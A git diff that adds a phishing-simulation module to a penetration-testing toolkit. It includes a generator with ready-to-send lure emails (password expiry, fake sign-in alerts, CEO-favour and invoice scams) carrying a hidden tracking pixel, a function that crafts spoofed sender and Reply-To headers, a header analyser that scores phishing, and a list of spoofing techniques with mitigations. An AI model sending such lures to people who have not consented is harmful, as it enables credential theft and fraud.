+    lines.push(`Passing Score: ${module.passingScore}%`)
+    lines.push("")
+    lines.push("Overview:")
+    lines.push(module.content.overview)
+    lines.push("")
+
+    for (const section of module.content.sections) {
+      lines.push(`--- ${section.title} ---`)
+      lines.push(section.content)
+
+      if (section.examples) {
+        lines.push("")
+        lines.push("Examples:")
+        for (const ex of section.examples) {
+          lines.push(`  • ${ex}`)
+        }
+      }
+
+      if (section.tips) {
+        lines.push("")
+        lines.push("Tips:")
+        for (const tip of section.tips) {
+          lines.push(`  ✓ ${tip}`)
+        }
+      }
+      lines.push("")
+    }
+
+    lines.push("Key Takeaways:")
+    for (const takeaway of module.content.keyTakeaways) {
+      lines.push(`  ⭐ ${takeaway}`)
+    }
+
+    return lines.join("\n")
+  }
+}
diff --git a/packages/opencode/src/pentest/soceng/email/generator.ts b/packages/opencode/src/pentest/soceng/email/generator.ts
new file mode 100644
index 00000000000..cd18f68804b
--- /dev/null
+++ b/packages/opencode/src/pentest/soceng/email/generator.ts
@@ -0,0 +1,526 @@
+/**
+ * @fileoverview Email Template Generator
+ *
+ * Generation of phishing email templates with variable substitution.
+ *
+ * @module pentest/soceng/email/generator
+ */
+
+import { SocEngTypes } from "../types"
+import { SocEngStorage } from "../storage"
+import { SocEngProfiles } from "../profiles"
+
+/**
+ * Email generator namespace.
+ */
+export namespace EmailGenerator {
+  // ========== Template Variables ==========
+
+  /**
+   * Standard template variables.
+   */
+  export const STANDARD_VARIABLES = [
+    "{{firstName}}",
+    "{{lastName}}",
+    "{{fullName}}",
+    "{{email}}",
+    "{{company}}",
+    "{{department}}",
+    "{{title}}",
+    "{{date}}",
+    "{{time}}",
+    "{{trackingUrl}}",
+    "{{landingUrl}}",
+    "{{unsubscribeUrl}}",
+  ]
+
+  /**
+   * Variable descriptions.
+   */
+  export const VARIABLE_DESCRIPTIONS: Record<string, string> = {
+    "{{firstName}}": "Target's first name",
+    "{{lastName}}": "Target's last name",
+    "{{fullName}}": "Target's full name",
+    "{{email}}": "Target's email address",
+    "{{company}}": "Target's company name",
+    "{{department}}": "Target's department",
+    "{{title}}": "Target's job title",
+    "{{date}}": "Current date",
+    "{{time}}": "Current time",
+    "{{trackingUrl}}": "URL with tracking pixel",
+    "{{landingUrl}}": "Landing page URL",
+    "{{unsubscribeUrl}}": "Fake unsubscribe URL",
+  }
+
+  // ========== Template Generation ==========
+
+  /**
+   * Template generation options.
+   */
+  export interface GenerateOptions {
+    category: string
+    scenario?: string
+    company?: string
+    senderName?: string
+    senderDomain?: string
+    urgency?: "low" | "medium" | "high"
+    includeAttachment?: boolean
+    attachmentType?: string
+  }
+
+  /**
+   * Generate email template based on category.
+   */
+  export function generateTemplate(options: GenerateOptions): SocEngTypes.EmailTemplate {
+    const templateId = SocEngStorage.createTemplateId()
+    const category = options.category
+
+    // Get template content based on category
+    const content = getTemplateContent(category, options)
+
+    return {
+      id: templateId,
+      name: `${category}-${Date.now()}`,
+      category,
+      subject: content.subject,
+      bodyHtml: content.html,
+      bodyText: content.text,
+      sender: {
+        name: options.senderName || content.senderName,
+        email: `${content.senderEmail}@${options.senderDomain || "example.com"}`,
+      },
+      variables: extractVariables(content.html),
+      createdAt: Date.now(),
+    }
+  }
+
+  /**
+   * Get template content for category.
+   */
+  function getTemplateContent(
+    category: string,
+    options: GenerateOptions
+  ): {
+    subject: string
+    html: string
+    text: string
+    senderName: string
+    senderEmail: string
+  } {
+    const templates = TEMPLATE_LIBRARY[category] || TEMPLATE_LIBRARY.generic
+    const template = templates[Math.floor(Math.random() * templates.length)]
+
+    return {
+      subject: substituteCompany(template.subject, options.company),
+      html: generateHtml(template, options),
+      text: generateText(template, options),
+      senderName: template.senderName,
+      senderEmail: template.senderEmail,
+    }
+  }
+
+  /**
+   * Generate HTML email body.
+   */
+  function generateHtml(
+    template: TemplateDefinition,
+    options: GenerateOptions
+  ): string {
+    let html = `<!DOCTYPE html>
+<html>
+<head>
+  <meta charset="utf-8">
+  <meta name="viewport" content="width=device-width, initial-scale=1.0">
+</head>
+<body style="font-family: Arial, sans-serif; font-size: 14px; line-height: 1.6; color: #333;">
+  <div style="max-width: 600px; margin: 0 auto; padding: 20px;">
+    ${template.bodyHtml}
+    ${template.signature || getDefaultSignature(template.senderName)}
+  </div>
+  <img src="{{trackingUrl}}" width="1" height="1" style="display:none" alt="">
+</body>
+</html>`
+
+    html = substituteCompany(html, options.company)
+    return html
+  }
+
+  /**
+   * Generate plain text email body.
+   */
+  function generateText(
+    template: TemplateDefinition,
+    options: GenerateOptions
+  ): string {
+    let text = template.bodyText + "\n\n" + (template.signatureText || template.senderName)
+    text = substituteCompany(text, options.company)
+    return text
+  }
+
+  /**
+   * Substitute company name in template.
+   */
+  function substituteCompany(text: string, company?: string): string {
+    return text.replace(/\{\{company\}\}/g, company || "{{company}}")
+  }
+
+  /**
+   * Extract variables from template.
+   */
+  function extractVariables(html: string): string[] {
+    const matches = html.match(/\{\{[a-zA-Z]+\}\}/g) || []
+    return [...new Set(matches)]
+  }
+
+  /**
+   * Get default email signature.
+   */
+  function getDefaultSignature(name: string): string {
+    return `
+    <br><br>
+    <p style="margin: 0;">Best regards,<br>
+    <strong>${name}</strong></p>
+    `
+  }
+
+  // ========== Template Library ==========
+
+  /**
+   * Template definition.
+   */
+  interface TemplateDefinition {
+    subject: string
+    bodyHtml: string
+    bodyText: string
+    senderName: string
+    senderEmail: string
+    signature?: string
+    signatureText?: string
+  }
+
+  /**
+   * Built-in template library.
+   */
+  const TEMPLATE_LIBRARY: Record<string, TemplateDefinition[]> = {
+    generic: [
+      {
+        subject: "Action Required: Please Review",
+        bodyHtml: `
+          <p>Dear {{firstName}},</p>
+          <p>We need you to review and confirm some information in our system.</p>
+          <p>Please click the link below to proceed:</p>
+          <p><a href="{{landingUrl}}" style="color: #0066cc;">Click here to review</a></p>
+          <p>This request will expire in 24 hours.</p>
+        `,
+        bodyText: `Dear {{firstName}},
+
+We need you to review and confirm some information in our system.
+
+Please click the link below to proceed:
+{{landingUrl}}
+
+This request will expire in 24 hours.`,
+        senderName: "System Administrator",
+        senderEmail: "admin",
+      },
+    ],
+
+    login: [
+      {
+        subject: "Password Expiration Notice",
+        bodyHtml: `
+          <p>Dear {{firstName}},</p>
+          <p>Your password will expire in <strong>24 hours</strong>.</p>
+          <p>To avoid any disruption to your work, please update your password now:</p>
+          <p><a href="{{landingUrl}}" style="display: inline-block; padding: 10px 20px; background-color: #0066cc; color: white; text-decoration: none; border-radius: 4px;">Update Password</a></p>
+          <p style="color: #666; font-size: 12px;">If you did not request this change, please contact IT support immediately.</p>
+        `,
+        bodyText: `Dear {{firstName}},
+
+Your password will expire in 24 hours.
+
+To avoid any disruption to your work, please update your password now:
+{{landingUrl}}
+
+If you did not request this change, please contact IT support immediately.`,
+        senderName: "IT Security Team",
+        senderEmail: "security",
+      },
+      {
+        subject: "Unusual Sign-in Activity Detected",
+        bodyHtml: `
+          <p>Dear {{firstName}},</p>
+          <p>We detected an unusual sign-in attempt on your account.</p>
+          <p><strong>Details:</strong></p>
+          <ul>
+            <li>Time: {{time}} {{date}}</li>
+            <li>Location: Unknown</li>
+            <li>Device: Unrecognized</li>
+          </ul>
+          <p>If this was you, please verify your identity:</p>
+          <p><a href="{{landingUrl}}" style="display: inline-block; padding: 10px 20px; background-color: #dc3545; color: white; text-decoration: none; border-radius: 4px;">Verify Now</a></p>
+          <p>If you don't recognize this activity, secure your account immediately.</p>
+        `,
+        bodyText: `Dear {{firstName}},
+
+We detected an unusual sign-in attempt on your account.
+
+Details:
+- Time: {{time}} {{date}}
+- Location: Unknown
+- Device: Unrecognized
+
+If this was you, please verify your identity:
+{{landingUrl}}
+
+If you don't recognize this activity, secure your account immediately.`,
+        senderName: "Security Alert",
+        senderEmail: "no-reply",
+      },
+    ],
+
+    hr: [
+      {
+        subject: "Important: Benefits Enrollment Reminder",
+        bodyHtml: `
+          <p>Dear {{firstName}},</p>
+          <p>This is a reminder that the benefits enrollment period ends soon.</p>
+          <p>Please review and confirm your selections before the deadline:</p>
+          <p><a href="{{landingUrl}}" style="display: inline-block; padding: 10px 20px; background-color: #28a745; color: white; text-decoration: none; border-radius: 4px;">Review Benefits</a></p>
+          <p>If you have any questions, please contact HR.</p>
+        `,
+        bodyText: `Dear {{firstName}},
+
+This is a reminder that the benefits enrollment period ends soon.
+
+Please review and confirm your selections before the deadline:
+{{landingUrl}}
+
+If you have any questions, please contact HR.`,
+        senderName: "Human Resources",
+        senderEmail: "hr",
+      },
+      {
+        subject: "Updated Employee Handbook - Acknowledgment Required",
+        bodyHtml: `
+          <p>Dear {{firstName}},</p>
+          <p>We have updated our employee handbook with important policy changes.</p>
+          <p>All employees are required to review and acknowledge the updates by end of week.</p>
+          <p><a href="{{landingUrl}}" style="display: inline-block; padding: 10px 20px; background-color: #17a2b8; color: white; text-decoration: none; border-radius: 4px;">Review & Acknowledge</a></p>
+        `,
+        bodyText: `Dear {{firstName}},
+
+We have updated our employee handbook with important policy changes.
+
+All employees are required to review and acknowledge the updates by end of week.
+
+{{landingUrl}}`,
+        senderName: "HR Department",
+        senderEmail: "hr-noreply",
+      },
+    ],
+
+    it: [
+      {
+        subject: "System Maintenance: Action Required",
+        bodyHtml: `
+          <p>Dear {{firstName}},</p>
+          <p>We are performing scheduled maintenance on our systems.</p>
+          <p>To ensure continued access, please verify your account:</p>
+          <p><a href="{{landingUrl}}" style="display: inline-block; padding: 10px 20px; background-color: #6c757d; color: white; text-decoration: none; border-radius: 4px;">Verify Account</a></p>
+          <p>This verification is required before {{date}}.</p>
+        `,
+        bodyText: `Dear {{firstName}},
+
+We are performing scheduled maintenance on our systems.
+
+To ensure continued access, please verify your account:
+{{landingUrl}}
+
+This verification is required before {{date}}.`,
+        senderName: "IT Support",
+        senderEmail: "it-support",
+      },
+    ],
+
+    executive: [
+      {
+        subject: "Urgent: Need Your Help",
+        bodyHtml: `
+          <p>{{firstName}},</p>
+          <p>I need a favor. Are you available right now?</p>
+          <p>I'm in a meeting and need you to handle something urgent for me.</p>
+          <p>Please reply to this email or click below to confirm you're available:</p>
+          <p><a href="{{landingUrl}}">Confirm Availability</a></p>
+          <p>Thanks,<br>CEO</p>
+        `,
+        bodyText: `{{firstName}},
+
+I need a favor. Are you available right now?
+
+I'm in a meeting and need you to handle something urgent for me.
+
+Please reply to this email or click below to confirm you're available:
+{{landingUrl}}
+
+Thanks,
+CEO`,
+        senderName: "CEO",
+        senderEmail: "ceo",
+      },
+    ],
+
+    financial: [
+      {
+        subject: "Invoice #INV-{{date}} - Payment Required",
+        bodyHtml: `
+          <p>Dear {{firstName}},</p>
+          <p>Please find attached the invoice for services rendered.</p>
+          <p>Payment is due within 30 days.</p>
+          <p><a href="{{landingUrl}}" style="display: inline-block; padding: 10px 20px; background-color: #ffc107; color: #333; text-decoration: none; border-radius: 4px;">View Invoice</a></p>
+          <p>For questions, please contact our billing department.</p>
+        `,
+        bodyText: `Dear {{firstName}},
+
+Please find attached the invoice for services rendered.
+
+Payment is due within 30 days.
+
+View Invoice: {{landingUrl}}
+
+For questions, please contact our billing department.`,
+        senderName: "Accounts Receivable",
+        senderEmail: "billing",
+      },
+    ],
+
+    delivery: [
+      {
+        subject: "Your Package Delivery Update",
+        bodyHtml: `
+          <p>Dear {{firstName}},</p>
+          <p>We attempted to deliver your package today but were unable to complete delivery.</p>
+          <p>Please schedule a new delivery time or arrange pickup:</p>
+          <p><a href="{{landingUrl}}" style="display: inline-block; padding: 10px 20px; background-color: #fd7e14; color: white; text-decoration: none; border-radius: 4px;">Schedule Delivery</a></p>
+          <p>Tracking #: PKG{{date}}{{time}}</p>
+        `,
+        bodyText: `Dear {{firstName}},
+
+We attempted to deliver your package today but were unable to complete delivery.
+
+Please schedule a new delivery time or arrange pickup:
+{{landingUrl}}
+
+Tracking #: PKG{{date}}{{time}}`,
+        senderName: "Delivery Services",
+        senderEmail: "delivery",
+      },
+    ],
+  }
+
+  // ========== Variable Substitution ==========
+
+  /**
+   * Substitute variables in template.
+   */
+  export function substituteVariables(
+    template: string,
+    target: SocEngTypes.Target,
+    additionalVars?: Record<string, string>
+  ): string {
+    let result = template
+
+    // Standard substitutions
+    result = result.replace(/\{\{firstName\}\}/g, target.firstName || "")
+    result = result.replace(/\{\{lastName\}\}/g, target.lastName || "")
+    result = result.replace(
+      /\{\{fullName\}\}/g,
+      `${target.firstName || ""} ${target.lastName || ""}`.trim()
+    )
+    result = result.replace(/\{\{email\}\}/g, target.email)
+    result = result.replace(/\{\{department\}\}/g, target.department || "")
+    result = result.replace(/\{\{title\}\}/g, target.title || "")
+
+    // Date/time
+    const now = new Date()
+    result = result.replace(/\{\{date\}\}/g, now.toLocaleDateString())
+    result = result.replace(/\{\{time\}\}/g, now.toLocaleTimeString())
+
+    // Custom fields
+    if (target.customFields) {
+      for (const [key, value] of Object.entries(target.customFields)) {
+        result = result.replace(new RegExp(`\\{\\{${key}\\}\\}`, "g"), String(value))
+      }
+    }
+
+    // Additional variables
+    if (additionalVars) {
+      for (const [key, value] of Object.entries(additionalVars)) {
+        result = result.replace(new RegExp(`\\{\\{${key}\\}\\}`, "g"), value)
+      }
+    }
+
+    return result
+  }
+
+  // ========== Template Validation ==========
+
+  /**
+   * Validate email template.
+   */
+  export function validateTemplate(template: SocEngTypes.EmailTemplate): {
+    valid: boolean
+    errors: string[]
+    warnings: string[]
+  } {
+    const errors: string[] = []
+    const warnings: string[] = []
+
+    if (!template.subject) {
+      errors.push("Subject is required")
+    }
+
+    if (!template.bodyHtml && !template.bodyText) {
+      errors.push("Email body (HTML or text) is required")
+    }
+
+    if (!template.sender.email) {
+      errors.push("Sender email is required")
+    }
+
+    // Check for unsubstituted required variables
+    const requiredVars = ["{{firstName}}", "{{landingUrl}}"]
+    for (const v of requiredVars) {
+      if (!template.bodyHtml.includes(v) && !template.bodyText.includes(v)) {
+        warnings.push(`Template does not include ${v}`)
+      }
+    }
+
+    // Check for tracking pixel
+    if (!template.bodyHtml.includes("{{trackingUrl}}")) {
+      warnings.push("Template does not include tracking pixel")
+    }
+
+    return {
+      valid: errors.length === 0,
+      errors,
+      warnings,
+    }
+  }
+
+  // ========== Template Categories ==========
+
+  /**
+   * Get available template categories.
+   */
+  export function getCategories(): string[] {
+    return Object.keys(TEMPLATE_LIBRARY)
+  }
+
+  /**
+   * Get templates for category.
+   */
+  export function getTemplatesForCategory(category: string): number {
+    return TEMPLATE_LIBRARY[category]?.length || 0
+  }
+}
diff --git a/packages/opencode/src/pentest/soceng/email/headers.ts b/packages/opencode/src/pentest/soceng/email/headers.ts
new file mode 100644
index 00000000000..ab565aea57e
--- /dev/null
+++ b/packages/opencode/src/pentest/soceng/email/headers.ts
@@ -0,0 +1,470 @@
+/**
+ * @fileoverview Email Header Analysis
+ *
+ * Analysis and crafting of email headers for phishing simulations.
+ *
+ * @module pentest/soceng/email/headers
+ */
+
+/**
+ * Email headers namespace.
+ */
+export namespace EmailHeaders {
+  // ========== Header Analysis ==========
+
+  /**
+   * Parsed email header.
+   */
+  export interface ParsedHeader {
+    name: string
+    value: string
+    raw: string
+  }
+
+  /**
+   * Header analysis result.
+   */
+  export interface HeaderAnalysis {
+    headers: ParsedHeader[]
+    fromAddress: string | null
+    replyTo: string | null
+    returnPath: string | null
+    receivedChain: ReceivedHeader[]
+    authenticationResults: AuthResult[]
+    suspiciousIndicators: string[]
+    phishingScore: number
+  }
+
+  /**
+   * Received header parsed.
+   */
+  export interface ReceivedHeader {
+    from: string
+    by: string
+    timestamp: string
+    raw: string
+  }
+
+  /**
+   * Authentication result.
+   */
+  export interface AuthResult {
+    method: "spf" | "dkim" | "dmarc"
+    result: "pass" | "fail" | "softfail" | "neutral" | "none"
+    details?: string
+  }
+
+  /**
+   * Parse email headers from raw text.
+   */
+  export function parseHeaders(rawHeaders: string): ParsedHeader[] {
+    const headers: ParsedHeader[] = []
+    const lines = rawHeaders.split(/\r?\n/)
+
+    let currentHeader: ParsedHeader | null = null
+
+    for (const line of lines) {
+      // Check for continuation (starts with whitespace)
+      if (/^\s/.test(line) && currentHeader) {
+        currentHeader.value += " " + line.trim()
+        currentHeader.raw += "\n" + line
+      } else {
+        // Save previous header
+        if (currentHeader) {
+          headers.push(currentHeader)
+        }
+
+        // Parse new header
+        const match = line.match(/^([^:]+):\s*(.*)$/)
+        if (match) {
+          currentHeader = {
+            name: match[1].trim(),
+            value: match[2].trim(),
+            raw: line,
+          }
+        } else {
+          currentHeader = null
+        }
+      }
+    }
+
+    // Don't forget last header
+    if (currentHeader) {
+      headers.push(currentHeader)
+    }
+
+    return headers
+  }
+
+  /**
+   * Analyze email headers for suspicious patterns.
+   */
+  export function analyzeHeaders(rawHeaders: string): HeaderAnalysis {
+    const headers = parseHeaders(rawHeaders)
+    const suspiciousIndicators: string[] = []
+
+    // Extract key headers
+    const fromHeader = headers.find((h) => h.name.toLowerCase() === "from")
+    const replyTo = headers.find((h) => h.name.toLowerCase() === "reply-to")
+    const returnPath = headers.find((h) => h.name.toLowerCase() === "return-path")
+
+    // Parse Received headers
+    const receivedChain = headers
+      .filter((h) => h.name.toLowerCase() === "received")
+      .map(parseReceivedHeader)
+
+    // Parse authentication results
+    const authResults = parseAuthenticationResults(headers)
+
+    // Check for suspicious patterns
+    const fromAddress = extractEmailAddress(fromHeader?.value || "")
+    const replyToAddress = extractEmailAddress(replyTo?.value || "")
+    const returnPathAddress = extractEmailAddress(returnPath?.value || "")
+
+    // Check From vs Reply-To mismatch
+    if (replyToAddress && fromAddress && getDomain(replyToAddress) !== getDomain(fromAddress)) {
+      suspiciousIndicators.push("Reply-To domain differs from From domain")
+    }
+
+    // Check Return-Path mismatch
+    if (returnPathAddress && fromAddress && getDomain(returnPathAddress) !== getDomain(fromAddress)) {
+      suspiciousIndicators.push("Return-Path domain differs from From domain")
+    }
+
+    // Check for failed authentication
+    for (const auth of authResults) {
+      if (auth.result === "fail" || auth.result === "softfail") {
+        suspiciousIndicators.push(`${auth.method.toUpperCase()} ${auth.result}`)
+      }
+    }
+
+    // Check for display name spoofing
+    if (fromHeader?.value) {
+      const displayName = fromHeader.value.match(/^"?([^"<]+)"?\s*</)
+      if (displayName) {
+        const name = displayName[1].trim().toLowerCase()
+        if (isExecutiveTitle(name) || isCompanyName(name)) {
+          suspiciousIndicators.push("Display name contains executive title or company name")
+        }
+      }
+    }
+
+    // Check X-headers
+    const xMailer = headers.find((h) => h.name.toLowerCase() === "x-mailer")
+    if (xMailer?.value.toLowerCase().includes("php")) {
+      suspiciousIndicators.push("Email sent via PHP (common in phishing)")
+    }
+
+    // Check for missing Message-ID
+    const messageId = headers.find((h) => h.name.toLowerCase() === "message-id")
+    if (!messageId) {
+      suspiciousIndicators.push("Missing Message-ID header")
+    }
+
+    // Calculate phishing score
+    const phishingScore = calculatePhishingScore(suspiciousIndicators, authResults)
+
+    return {
+      headers,
+      fromAddress,
+      replyTo: replyToAddress,
+      returnPath: returnPathAddress,
+      receivedChain,
+      authenticationResults: authResults,
+      suspiciousIndicators,
+      phishingScore,
+    }
+  }
+
+  /**
+   * Parse Received header.
+   */
+  function parseReceivedHeader(header: ParsedHeader): ReceivedHeader {
+    const value = header.value
+
+    // Extract "from" part
+    const fromMatch = value.match(/from\s+([^\s]+)/i)
+    const from = fromMatch ? fromMatch[1] : ""
+
+    // Extract "by" part
+    const byMatch = value.match(/by\s+([^\s]+)/i)
+    const by = byMatch ? byMatch[1] : ""
+
+    // Extract timestamp
+    const timestampMatch = value.match(/;\s*(.+)$/)
+    const timestamp = timestampMatch ? timestampMatch[1].trim() : ""
+
+    return { from, by, timestamp, raw: value }
+  }
+
+  /**
+   * Parse Authentication-Results header.
+   */
+  function parseAuthenticationResults(headers: ParsedHeader[]): AuthResult[] {
+    const results: AuthResult[] = []
+
+    const authHeaders = headers.filter(
+      (h) =>
+        h.name.toLowerCase() === "authentication-results" ||
+        h.name.toLowerCase() === "arc-authentication-results"
+    )
+
+    for (const header of authHeaders) {
+      // Parse SPF
+      const spfMatch = header.value.match(/spf=(\w+)/i)
+      if (spfMatch) {
+        results.push({
+          method: "spf",
+          result: spfMatch[1].toLowerCase() as AuthResult["result"],
+        })
+      }
+
+      // Parse DKIM
+      const dkimMatch = header.value.match(/dkim=(\w+)/i)
+      if (dkimMatch) {
+        results.push({
+          method: "dkim",
+          result: dkimMatch[1].toLowerCase() as AuthResult["result"],
+        })
+      }
+
+      // Parse DMARC
+      const dmarcMatch = header.value.match(/dmarc=(\w+)/i)
+      if (dmarcMatch) {
+        results.push({
+          method: "dmarc",
+          result: dmarcMatch[1].toLowerCase() as AuthResult["result"],
+        })
+      }
+    }
+
+    return results
+  }
+
+  /**
+   * Extract email address from header value.
+   */
+  function extractEmailAddress(value: string): string | null {
+    const match = value.match(/<([^>]+)>/) || value.match(/([^\s<>]+@[^\s<>]+)/)
+    return match ? match[1] : null
+  }
+
+  /**
+   * Get domain from email address.
+   */
+  function getDomain(email: string): string {
+    const parts = email.split("@")
+    return parts.length > 1 ? parts[1].toLowerCase() : ""
+  }
+
+  /**
+   * Check if name appears to be an executive title.
+   */
+  function isExecutiveTitle(name: string): boolean {
+    const titles = ["ceo", "cfo", "cto", "coo", "president", "director", "vice president", "vp"]
+    return titles.some((t) => name.includes(t))
+  }
+
+  /**
+   * Check if name appears to be a company name pattern.
+   */
+  function isCompanyName(name: string): boolean {
+    const patterns = ["inc", "corp", "llc", "ltd", "company", "enterprises"]
+    return patterns.some((p) => name.includes(p))
+  }
+
+  /**
+   * Calculate phishing score (0-100).
+   */
+  function calculatePhishingScore(
+    indicators: string[],
+    authResults: AuthResult[]
+  ): number {
+    let score = 0
+
+    // Each indicator adds points
+    score += indicators.length * 15
+
+    // Failed authentication adds significant points
+    for (const auth of authResults) {
+      if (auth.result === "fail") score += 25
+      else if (auth.result === "softfail") score += 15
+      else if (auth.result === "neutral" || auth.result === "none") score += 10
+    }
+
+    return Math.min(100, score)
+  }
+
+  // ========== Header Crafting ==========
+
+  /**
+   * Headers to include in phishing simulation.
+   */
+  export interface CraftedHeaders {
+    from: string
+    to: string
+    subject: string
+    date: string
+    messageId: string
+    mimeVersion: string
+    contentType: string
+    xMailer?: string
+    replyTo?: string
+    returnPath?: string
+    xPriority?: string
+    importance?: string
+    custom?: Record<string, string>
+  }
+
+  /**
+   * Generate headers for phishing email.
+   */
+  export function craftHeaders(options: {
+    from: { name: string; email: string }
+    to: string
+    subject: string
+    replyTo?: string
+    priority?: "high" | "normal" | "low"
+    mailer?: string
+    custom?: Record<string, string>
+  }): CraftedHeaders {
+    const messageId = generateMessageId(options.from.email)
+    const date = new Date().toUTCString()
+
+    const headers: CraftedHeaders = {
+      from: `"${options.from.name}" <${options.from.email}>`,
+      to: options.to,
+      subject: options.subject,
+      date,
+      messageId,
+      mimeVersion: "1.0",
+      contentType: 'text/html; charset="UTF-8"',
+    }
+
+    if (options.replyTo) {
+      headers.replyTo = options.replyTo
+    }
+
+    if (options.priority === "high") {
+      headers.xPriority = "1"
+      headers.importance = "high"
+    } else if (options.priority === "low") {
+      headers.xPriority = "5"
+      headers.importance = "low"
+    }
+
+    if (options.mailer) {
+      headers.xMailer = options.mailer
+    }
+
+    if (options.custom) {
+      headers.custom = options.custom
+    }
+
+    return headers
+  }
+
+  /**
+   * Generate Message-ID.
+   */
+  function generateMessageId(domain: string): string {
+    const timestamp = Date.now().toString(36)
+    const random = Math.random().toString(36).substring(2, 12)
+    const domainPart = domain.split("@").pop() || "localhost"
+    return `<${timestamp}.${random}@${domainPart}>`
+  }
+
+  /**
+   * Format headers as string.
+   */
+  export function formatHeaders(headers: CraftedHeaders): string {
+    const lines: string[] = []
+
+    lines.push(`From: ${headers.from}`)
+    lines.push(`To: ${headers.to}`)
+    lines.push(`Subject: ${headers.subject}`)
+    lines.push(`Date: ${headers.date}`)
+    lines.push(`Message-ID: ${headers.messageId}`)
+    lines.push(`MIME-Version: ${headers.mimeVersion}`)
+    lines.push(`Content-Type: ${headers.contentType}`)
+
+    if (headers.replyTo) {
+      lines.push(`Reply-To: ${headers.replyTo}`)
+    }
+    if (headers.returnPath) {
+      lines.push(`Return-Path: ${headers.returnPath}`)
+    }
+    if (headers.xPriority) {
+      lines.push(`X-Priority: ${headers.xPriority}`)
+    }
+    if (headers.importance) {
+      lines.push(`Importance: ${headers.importance}`)
+    }
+    if (headers.xMailer) {
+      lines.push(`X-Mailer: ${headers.xMailer}`)
+    }
+
+    if (headers.custom) {
+      for (const [key, value] of Object.entries(headers.custom)) {
+        lines.push(`${key}: ${value}`)
+      }
+    }
+
+    return lines.join("\r\n")
+  }
+
+  // ========== Formatting ==========
+
+  /**
+   * Format header analysis for display.
+   */
+  export function formatAnalysis(analysis: HeaderAnalysis): string {
+    const lines: string[] = []
+
+    lines.push("Email Header Analysis")
+    lines.push("=".repeat(50))
+    lines.push("")
+
+    lines.push(`From: ${analysis.fromAddress || "Not found"}`)
+    if (analysis.replyTo) {
+      lines.push(`Reply-To: ${analysis.replyTo}`)
+    }
+    if (analysis.returnPath) {
+      lines.push(`Return-Path: ${analysis.returnPath}`)
+    }
+
+    lines.push("")
+    lines.push("Authentication Results:")
+    if (analysis.authenticationResults.length === 0) {
+      lines.push("  No authentication results found")
+    } else {
+      for (const auth of analysis.authenticationResults) {
+        const icon = auth.result === "pass" ? "✓" : "✗"
+        lines.push(`  ${icon} ${auth.method.toUpperCase()}: ${auth.result}`)
+      }
+    }
+
+    lines.push("")
+    lines.push(`Received Chain (${analysis.receivedChain.length} hops):`)
+    for (let i = 0; i < Math.min(3, analysis.receivedChain.length); i++) {
+      const hop = analysis.receivedChain[i]
+      lines.push(`  ${i + 1}. ${hop.from} -> ${hop.by}`)
+    }
+    if (analysis.receivedChain.length > 3) {
+      lines.push(`  ... and ${analysis.receivedChain.length - 3} more`)
+    }
+
+    lines.push("")
+    lines.push(`Phishing Score: ${analysis.phishingScore}/100`)
+
+    if (analysis.suspiciousIndicators.length > 0) {
+      lines.push("")
+      lines.push("Suspicious Indicators:")
+      for (const indicator of analysis.suspiciousIndicators) {
+        lines.push(`  ⚠ ${indicator}`)
+      }
+    }
+
+    return lines.join("\n")
+  }
+}
diff --git a/packages/opencode/src/pentest/soceng/email/index.ts b/packages/opencode/src/pentest/soceng/email/index.ts
new file mode 100644
index 00000000000..4e102fca38c
--- /dev/null
+++ b/packages/opencode/src/pentest/soceng/email/index.ts
@@ -0,0 +1,12 @@
+/**
+ * @fileoverview Email Module
+ *
+ * Email security assessment and phishing email generation.
+ *
+ * @module pentest/soceng/email
+ */
+
+export { EmailGenerator } from "./generator"
+export { EmailValidation } from "./validation"
+export { EmailHeaders } from "./headers"
+export { EmailSpoof } from "./spoof"
diff --git a/packages/opencode/src/pentest/soceng/email/spoof.ts b/packages/opencode/src/pentest/soceng/email/spoof.ts
new file mode 100644
index 00000000000..91be46e0ca8
--- /dev/null
+++ b/packages/opencode/src/pentest/soceng/email/spoof.ts
@@ -0,0 +1,443 @@
+/**
+ * @fileoverview Email Spoofing Detection
+ *
+ * Detection and analysis of email spoofing vulnerabilities.
+ *
+ * @module pentest/soceng/email/spoof
+ */
+
+import { SocEngTypes } from "../types"
+import { EmailValidation } from "./validation"
+
+/**
+ * Email spoofing namespace.
+ */
+export namespace EmailSpoof {
+  // ========== Spoofing Techniques ==========
+
+  /**
+   * Spoofing technique description.
+   */
+  export interface SpoofingTechnique {
+    name: string
+    description: string
+    requirements: string[]
+    effectiveness: "low" | "medium" | "high"
+    detectability: "low" | "medium" | "high"
+    mitigations: string[]
+  }
+
+  /**
+   * Known spoofing techniques.
+   */
+  export const SPOOFING_TECHNIQUES: SpoofingTechnique[] = [
+    {
+      name: "Display Name Spoofing",
+      description: "Using a legitimate name in the display name field while using a different email address",
+      requirements: ["Any email sending capability"],
+      effectiveness: "medium",
+      detectability: "low",
+      mitigations: [
+        "Train users to check actual email addresses",
+        "Configure email client to show full addresses",
+        "Use external sender warnings",
+      ],
+    },
+    {
+      name: "Domain Spoofing",
+      description: "Sending email with a forged From address from another domain",
+      requirements: ["Weak or missing SPF/DKIM/DMARC on target domain"],
+      effectiveness: "high",
+      detectability: "medium",
+      mitigations: [
+        "Implement strict SPF with -all",
+        "Enable DKIM signing",
+        "Deploy DMARC with p=reject",
+      ],
+    },
+    {
+      name: "Lookalike Domain",
+      description: "Registering a domain visually similar to the target (homograph attack)",
+      requirements: ["Register similar domain"],
+      effectiveness: "high",
+      detectability: "low",
+      mitigations: [
+        "Register similar domains proactively",
+        "Monitor for lookalike domain registrations",
+        "User awareness training",
+      ],
+    },
+    {
+      name: "Subdomain Spoofing",
+      description: "Using subdomains to make emails appear legitimate (e.g., company.attacker.com)",
+      requirements: ["Control of attacker domain"],
+      effectiveness: "medium",
+      detectability: "medium",
+      mitigations: [
+        "User awareness training",
+        "URL/domain inspection tools",
+      ],
+    },
+    {
+      name: "Reply-To Spoofing",
+      description: "Setting Reply-To to a different address than From to capture responses",
+      requirements: ["Any email sending capability"],
+      effectiveness: "medium",
+      detectability: "medium",
+      mitigations: [
+        "Warn users when Reply-To differs from From",
+        "Email gateway rules",
+      ],
+    },
+    {
+      name: "Cousin Domain",
+      description: "Using a related but different domain (e.g., company-support.com vs company.com)",
+      requirements: ["Register cousin domain"],
+      effectiveness: "high",
+      detectability: "low",
+      mitigations: [
+        "Brand monitoring",
+        "Domain registration monitoring",
+        "User awareness training",
+      ],
+    },
+    {
+      name: "Compromised Account",
+      description: "Using a legitimately compromised email account",
+      requirements: ["Account credentials or session access"],
+      effectiveness: "high",
+      detectability: "low",
+      mitigations: [
+        "MFA enforcement",
+        "Anomaly detection",
+        "Account compromise monitoring",
+      ],
+    },
+  ]
+
